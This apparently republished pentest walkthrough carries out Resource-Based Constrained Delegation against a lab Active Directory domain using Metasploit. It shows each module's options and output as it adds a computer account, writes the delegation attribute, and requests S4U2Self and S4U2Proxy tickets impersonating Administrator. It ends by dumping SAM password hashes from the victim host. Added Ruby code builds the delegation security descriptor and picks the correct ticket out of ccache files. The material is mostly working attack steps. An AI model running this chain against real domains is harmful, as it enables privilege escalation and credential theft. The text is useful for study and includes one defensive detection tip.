msf6 auxiliary(admin/dcerpc/samr_computer)> show options
Module options (auxiliary/admin/dcerpc/samr_computer):
Name Current Setting Required Description
---- --------------- -------- -----------
COMPUTER_NAME no The computer name
RHOSTS 172.16.73.6 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain n00py.local no The Windows domain to use for authentication
SMBPass Password1 no The password for the specified username
SMBUser n00py no The username to authenticate as
When ACTION is ADD_COMPUTER:
Name Current Setting Required Description
---- --------------- -------- -----------
COMPUTER_PASSWORD no The password for the new computer
Auxiliary action:
Name Description
---- -----------
ADD_COMPUTER Add a computer account
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/dcerpc/samr_computer) > run
[*] Running module against 172.16.73.6
[+] 172.16.73.6:445 - Successfully created n00py.local\DESKTOP-MKFA61G6$
[+] 172.16.73.6:445 - Password: 7TH6BPcPqXo5OLTIy3XJbwS77d3VPhyj
[+] 172.16.73.6:445 - SID: S-1-5-21-3387312503-3460017432-368973690-1135
[*] Auxiliary module execution completed
Once you have the new computer account, the delegation has to be configured on the victim computer. With Impacket this would be rbcd.py; here we use auxiliary/admin/ldap/rbcd. Note that RHOSTS is the domain controller, not the victim: the module binds to LDAP on the DC and edits the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the DELEGATE_TO computer object, so the user you authenticate as needs write access to that attribute on the victim's computer object. The read action shows the current value of the attribute and the write action adds DELEGATE_FROM to it.
msf6 auxiliary(admin/ldap/rbcd) > show options
Module options (auxiliary/admin/ldap/rbcd):
Name Current Setting Required Description
---- --------------- -------- -----------
DELEGATE_FROM DESKTOP-MKFA61G6$ no The delegation source
DELEGATE_TO WIN-27M967MQJL4$ yes The delegation target
DOMAIN n00py.local no The domain to authenticate to
PASSWORD Password1 no The password to authenticate with
RHOSTS 172.16.73.6 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 389 yes The target port
SSL false no Enable SSL on the LDAP connection
USERNAME n00py no The username to authenticate with
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/ldap/rbcd) > read
[*] Running module against 172.16.73.6
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] 172.16.73.6:389 Getting root DSE
[+] 172.16.73.6:389 Discovered base DN: DC=n00py,DC=local
[*] The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/ldap/rbcd) > write
[*] Running module against 172.16.73.6
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] 172.16.73.6:389 Getting root DSE
[+] 172.16.73.6:389 Discovered base DN: DC=n00py,DC=local
[+] Successfully created the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
[*] Added account:
[*] S-1-5-21-3387312503-3460017432-368973690-1135 (DESKTOP-MKFA61G6$)
[*] Auxiliary module execution completed
msf6 auxiliary(admin/ldap/rbcd) > read
[*] Running module against 172.16.73.6
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] 172.16.73.6:389 Getting root DSE
[+] 172.16.73.6:389 Discovered base DN: DC=n00py,DC=local
[*] Allowed accounts:
[*] S-1-5-21-3387312503-3460017432-368973690-1135 (DESKTOP-MKFA61G6$)
[*] Auxiliary module execution completed
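What the read and write actions above manipulate is a self-relative Windows security descriptor stored in the msDS-AllowedToActOnBehalfOfOtherIdentity attribute. The following is an added example, not code from the original post or from the Metasploit module: it builds such a descriptor for a list of delegating SIDs (one ACCESS_ALLOWED ACE per SID, owner and group set to BUILTIN\Administrators, and the full-control mask 0x000F01FF that Impacket's rbcd.py writes) and decodes one back into the list of SIDs that the read action prints. Layouts follow MS-DTYP; the SID used in the usage section is the one reported by samr_computer above.

```ruby
# Added example (not from the original post or Metasploit): encode/decode the RBCD
# security descriptor held in msDS-AllowedToActOnBehalfOfOtherIdentity.
ACCESS_ALLOWED_ACE_TYPE = 0
SE_DACL_PRESENT         = 0x0004
SE_SELF_RELATIVE        = 0x8000
FULL_CONTROL_MASK       = 0x000F01FF       # the mask Impacket's rbcd.py writes for the ACE
OWNER_SID               = 'S-1-5-32-544'   # BUILTIN\Administrators as owner and group

# "S-1-5-21-..." -> binary SID: revision, subauthority count, 48-bit big-endian authority,
# little-endian 32-bit subauthorities
def sid_to_bin(sid)
  parts = sid.split('-')
  raise ArgumentError, "malformed SID #{sid}" unless parts[0] == 'S' && parts[1] == '1' && parts.size >= 3
  authority = parts[2].to_i
  subs = parts[3..].map(&:to_i)
  [1, subs.size].pack('CC') + [authority].pack('Q>')[2, 6] + subs.pack('V*')
end

# binary SID at buf[offset] -> ["S-1-...", byte length]
def bin_to_sid(buf, offset)
  rev, count = buf[offset, 2].unpack('CC')
  raise "unsupported SID revision #{rev}" unless rev == 1
  authority = ("\x00\x00".b + buf[offset + 2, 6]).unpack1('Q>')
  subs = buf[offset + 8, 4 * count].unpack('V*')
  [(['S', 1, authority] + subs).join('-'), 8 + 4 * count]
end

# Equivalent of the module's write action: one ACCESS_ALLOWED ACE per delegating account
def build_rbcd_sd(delegate_sids)
  aces = delegate_sids.map { |sid|
    body = [FULL_CONTROL_MASK].pack('V') + sid_to_bin(sid)
    [ACCESS_ALLOWED_ACE_TYPE, 0, 4 + body.bytesize].pack('CCv') + body   # AceType, AceFlags, AceSize
  }.join
  dacl = [2, 0, 8 + aces.bytesize, delegate_sids.size, 0].pack('CCvvv') + aces   # ACL_REVISION = 2
  owner = sid_to_bin(OWNER_SID)
  owner_off = 20                                  # fixed size of the SD header
  group_off = owner_off + owner.bytesize
  dacl_off  = group_off + owner.bytesize          # group SID is the same as the owner SID
  header = [1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE, owner_off, group_off, 0, dacl_off].pack('CCvVVVV')
  header + owner + owner + dacl
end

# Equivalent of the module's read action: the SIDs allowed to act on behalf of other identities
def parse_rbcd_sd(sd)
  sd = sd.b
  rev, _sbz1, control, _owner_off, _group_off, _sacl_off, dacl_off = sd.unpack('CCvVVVV')
  raise "unsupported SD revision #{rev}" unless rev == 1
  return [] if (control & SE_DACL_PRESENT).zero? || dacl_off.zero?   # attribute set but no DACL
  _acl_rev, _sbz, _acl_size, ace_count, _sbz2 = sd[dacl_off, 8].unpack('CCvvv')
  pos = dacl_off + 8
  entries = []
  ace_count.times do
    type, _flags, size = sd[pos, 4].unpack('CCv')
    if type == ACCESS_ALLOWED_ACE_TYPE
      mask = sd[pos + 4, 4].unpack1('V')
      sid, _len = bin_to_sid(sd, pos + 8)
      entries << { sid: sid, mask: mask }
    end
    pos += size                                   # AceSize skips ACE types we do not decode
  end
  entries
end

if __FILE__ == $PROGRAM_NAME
  # SID of DESKTOP-MKFA61G6$ as printed by samr_computer above
  sd = build_rbcd_sd(['S-1-5-21-3387312503-3460017432-368973690-1135'])
  puts "attribute value: #{sd.bytesize} bytes"
  parse_rbcd_sd(sd).each { |e| puts format('allowed: %s mask=0x%08x', e[:sid], e[:mask]) }
end
```

Defenders can run the same decoder over the attribute of every computer object and alert on SIDs that are not expected there, which is exactly what the read action shows for a single host.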
Once delegation is configured we can request a service ticket for any user. With Impacket this would be getST.py; here we use auxiliary/admin/kerberos/get_ticket, authenticating as the new computer account (USERNAME is the account name including the trailing $, PASSWORD is the password printed when the account was created). With IMPERSONATE and SPN set, the module first obtains a TGT for the computer account, then a ticket for the impersonated user to the computer account itself (S4U2Self), and finally a ticket for that user to the SPN (S4U2Proxy). All three are saved to loot; the last TGS file written is the S4U2Proxy ticket for the SPN, and that is the one we use in the next step. S4U2Proxy fails if the impersonated user is a member of Protected Users or marked "Account is sensitive and cannot be delegated".
msf6 auxiliary(admin/kerberos/get_ticket) > show options
Module options (auxiliary/admin/kerberos/get_ticket):
Name Current Setting Required Description
---- --------------- -------- -----------
AES_KEY no The AES key to use for Kerberos authentication in hex string. Supported keys: 128 or 256 bits
CERT_FILE no The PKCS12 (.pfx) certificate file to authenticate with
CERT_PASSWORD no The certificate file's password
DOMAIN n00py.local no The Fully Qualified Domain Name (FQDN). Ex: mydomain.local
NTHASH no The NT hash in hex string. Server must support RC4
PASSWORD 7TH6BPcPqXo5OLTIy3XJbwS77d3VPhyj no The domain user's password
RHOSTS 172.16.73.6 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 88 yes The target port
Timeout 10 yes The TCP timeout to establish Kerberos connection and read data
USERNAME DESKTOP-MKFA61G6$ no The domain user
When ACTION is GET_TGS:
Name Current Setting Required Description
---- --------------- -------- -----------
IMPERSONATE Administrator no The user on whose behalf a TGS is requested (it will use S4U2Self/S4U2Proxy to request the ticket)
SPN CIFS/WIN-27M967MQJL4.n00py.local no The Service Principal Name, format is service_name/FQDN. Ex: cifs/dc01.mydomain.local
Auxiliary action:
Name Description
---- -----------
GET_TGS Request a Ticket-Granting-Service (TGS)
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/kerberos/get_ticket) > set verbose true
verbose => true
msf6 auxiliary(admin/kerberos/get_ticket) > run
Running module against 172.16.73.6
172.16.73.6:88 - Received a valid TGT-Response
172.16.73.6:88 - TGT MIT Credential Cache ticket saved to /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_994901.bin
172.16.73.6:88 - Getting TGS impersonating Administrator@n00py.local (SPN: CIFS/WIN-27M967MQJL4.n00py.local)
172.16.73.6:88 - Received a valid TGS-Response
172.16.73.6:88 - TGS MIT Credential Cache ticket saved to /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_606526.bin
172.16.73.6:88 - Received a valid TGS-Response
172.16.73.6:88 - TGS MIT Credential Cache ticket saved to /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_662784.bin
Auxiliary module execution completed
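The run above saved three ccache files with near-identical names (the TGT, the S4U2Self ticket and the S4U2Proxy ticket), and the next step only works with the one whose server principal is the CIFS SPN. The following is an added example, not code from the original post or from Metasploit: a small reader for MIT Kerberos credential caches (the format of the loot files) that lists the client and server principal of every credential, plus a writer that builds a constructed sample so the reader can be exercised offline. The principals, realm and times of the sample are made up to match the lab above; the session key and ticket bytes are placeholders.

```ruby
# Added example (not from the original post or Metasploit): inspect MIT ccache files
# (v3/v4, big-endian, length-prefixed fields) to find the ticket for a given SPN.
class CcacheReader
  def initialize(bytes)
    @b = bytes.b
    @pos = 0
  end

  def u8;  v = @b.getbyte(@pos);         @pos += 1; v; end
  def u16; v = @b[@pos, 2].unpack1('n'); @pos += 2; v; end
  def u32; v = @b[@pos, 4].unpack1('N'); @pos += 4; v; end
  def data; n = u32; v = @b[@pos, n];    @pos += n; v; end
  def skip(n); @pos += n; end
  def eof?; @pos >= @b.bytesize; end

  # principal: name_type, component count, realm, components
  def principal
    name_type = u32
    count = u32
    realm = data
    comps = Array.new(count) { data }
    "#{comps.join('/')}@#{realm}"
  end

  def credential(version)
    client = principal
    server = principal
    enctype = u16
    u16 if version == 3                               # v3 stores the enctype twice
    _session_key = data
    _authtime, _starttime, endtime, _renew_till = u32, u32, u32, u32
    _is_skey = u8
    flags = u32
    u32.times { u16; data }                           # addresses
    u32.times { u16; data }                           # authorization data
    ticket = data
    _second_ticket = data
    { client: client, server: server, enctype: enctype, endtime: endtime, flags: flags, ticket: ticket }
  end
end

def read_ccache(bytes)
  r = CcacheReader.new(bytes)
  raise 'not an MIT ccache (bad magic)' unless r.u8 == 5
  version = r.u8
  raise "unsupported ccache version #{version}" unless [3, 4].include?(version)
  r.skip(r.u16) if version == 4                       # v4 tagged header (KDC time offset); not needed
  default = r.principal
  creds = []
  creds << r.credential(version) until r.eof?
  { default_principal: default, credentials: creds }
end

# Credentials whose server principal is the given SPN (service/host), case-insensitively.
# The host part is what SMB::Rhostname has to match in the next step.
def tickets_for_spn(bytes, spn)
  read_ccache(bytes)[:credentials].select { |c| c[:server].split('@', 2).first.casecmp?(spn) }
end

class CcacheWriter
  attr_reader :bytes
  def initialize; @bytes = ''.b; end
  def u8(v);  @bytes << [v].pack('C'); self; end
  def u16(v); @bytes << [v].pack('n'); self; end
  def u32(v); @bytes << [v].pack('N'); self; end
  def data(s); u32(s.bytesize); @bytes << s.b; self; end
  def principal(realm, comps, name_type)
    u32(name_type).u32(comps.size).data(realm)
    comps.each { |c| data(c) }
    self
  end
end

# Constructed sample (not a real capture): a v4 cache holding one service ticket.
# Key and ticket bytes are placeholders; principals, enctype and times are the meaningful parts.
def build_sample_ccache(client:, server:, realm:, endtime:, enctype: 18)
  w = CcacheWriter.new
  w.u8(5).u8(4).u16(0)                                      # version 4, empty header
  w.principal(realm, client, 1)                             # default principal (KRB_NT_PRINCIPAL)
  w.principal(realm, client, 1).principal(realm, server, 2) # credential client, server (KRB_NT_SRV_INST)
  w.u16(enctype).data("\x00".b * 32)                        # AES256-sized session key placeholder
  w.u32(endtime - 36_000).u32(endtime - 36_000).u32(endtime).u32(endtime + 86_400)
  w.u8(0).u32(0x40a00000)                                   # is_skey=0; forwardable|renewable|pre-authent
  w.u32(0).u32(0)                                           # no addresses, no authorization data
  w.data("\x30\x00".b).data(''.b)                           # ticket placeholder, no second ticket
  w.bytes
end

if __FILE__ == $PROGRAM_NAME && ARGV[0]
  # usage: ruby ccache_check.rb <ccache file> [service/host]
  raw = File.binread(ARGV[0])
  cc = read_ccache(raw)
  puts "default principal: #{cc[:default_principal]}"
  cc[:credentials].each { |c| puts format('%s -> %s etype=%d expires=%s', c[:client], c[:server], c[:enctype], Time.at(c[:endtime]).utc) }
  puts "tickets for #{ARGV[1]}: #{tickets_for_spn(raw, ARGV[1]).size}" if ARGV[1]
end
```

Run it against each of the three loot files: the TGT shows krbtgt/N00PY.LOCAL as the server, the S4U2Self ticket shows the computer account itself, and only the S4U2Proxy ticket shows cifs/WIN-27M967MQJL4.n00py.local with Administrator as the client.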
Finally, with that ticket we can perform administrative actions on the target. Normally a pentester would use Impacket's secretsdump.py or CrackMapExec (the same thing under the hood) to recover the system's credentials. We can do this with Metasploit's auxiliary/gather/windows_secrets_dump module, which is equivalent to running CrackMapExec with both --sam and --lsa. Note that RHOSTS is now the victim computer (172.16.73.12) rather than the DC, SMBUser is the impersonated user, and SMBPass stays empty because the ticket does the authenticating. The only tricky part is making this work with Kerberos authentication, which means going into the advanced options: SMB::Auth must be kerberos, SMB::Krb5Ccname must point at the S4U2Proxy ticket saved above (the last ccache file written), and SMB::Rhostname must be exactly the host part of the SPN in that ticket, since a service ticket is only valid for the SPN it was issued for.
msf6 auxiliary(gather/windows_secrets_dump) > show options
Module options (auxiliary/gather/windows_secrets_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 172.16.73.12 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain n00py.local no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser Administrator no The username to authenticate as
Auxiliary action:
Name Description
---- -----------
ALL Dump everything
View the full module info with the info, or info -d command.
msf6 auxiliary(gather/windows_secrets_dump) > show advanced
Module advanced options (auxiliary/gather/windows_secrets_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
[TRUNCATED]
SMB::Auth kerberos yes The Authentication mechanism to use (Accepted: auto, ntlm, kerberos)
[TRUNCATED]
Active when SMB::Auth is kerberos:
Name Current Setting Required Description
---- --------------- -------- -----------
DomainControllerRhost WIN-NDA9607EHKS.n00py.local no The resolvable rhost for the Domain Controller
KrbCacheMode read-write yes Kerberos ticket cache storage mode (Accepted: none, read-only, write-only, read-write)
SMB::Krb5Ccname /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_662784.bin no The ccache file to use for kerberos authentication
SMB::KrbOfferedEncryptionTypes AES256,AES128,RC4-HMAC,DES-CBC-MD5,DES3-CBC-SHA1 yes Kerberos encryption types to offer
SMB::Rhostname WIN-27M967MQJL4.n00py.local no The rhostname which is required for kerberos - the SPN
View the full module info with the info, or info -d command.
msf6 auxiliary(gather/windows_secrets_dump) > run
[*] Running module against 172.16.73.12
[*] 172.16.73.12:445 - Opening Service Control Manager
[*] 172.16.73.12:445 - Binding to svcctl...
[+] 172.16.73.12:445 - Bound to svcctl
[*] 172.16.73.12:445 - Service RemoteRegistry is in stopped state
[*] 172.16.73.12:445 - Starting service...
[*] 172.16.73.12:445 - Retrieving target system bootKey
[*] 172.16.73.12:445 - Retrieving class info for SYSTEM\CurrentControlSet\Control\Lsa\JD
[*] 172.16.73.12:445 - Retrieving class info for SYSTEM\CurrentControlSet\Control\Lsa\Skew1
[*] 172.16.73.12:445 - Retrieving class info for SYSTEM\CurrentControlSet\Control\Lsa\GBG
[*] 172.16.73.12:445 - Retrieving class info for SYSTEM\CurrentControlSet\Control\Lsa\Data
[+] 172.16.73.12:445 - bootKey: 0x1a9c42b4c664bb5ab1c699858559fc76
[*] 172.16.73.12:445 - Checking NoLMHash policy
[*] 172.16.73.12:445 - LMHashes are not being stored
[*] 172.16.73.12:445 - Saving remote SAM database
[*] 172.16.73.12:445 - Create SAM key
[*] 172.16.73.12:445 - Save key to PUnE0CMU.tmp
[*] 172.16.73.12:445 - Dumping SAM hashes
[*] 172.16.73.12:445 - Calculating HashedBootKey from SAM
[*] 172.16.73.12:445 - Password hints:
No users with password hints on this system
[*] 172.16.73.12:445 - Password hashes (pwdump format - uid:rid:lmhash:nthash:::):
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b0abb98152c261c4c23429ed9eecc117:::
[TRUNCATED]
[*] Auxiliary module execution completed
Originally published on the WeChat public account 网络安全交流圈: Exploiting Resource-Based Constrained Delegation (RBCD) with pure Metasploit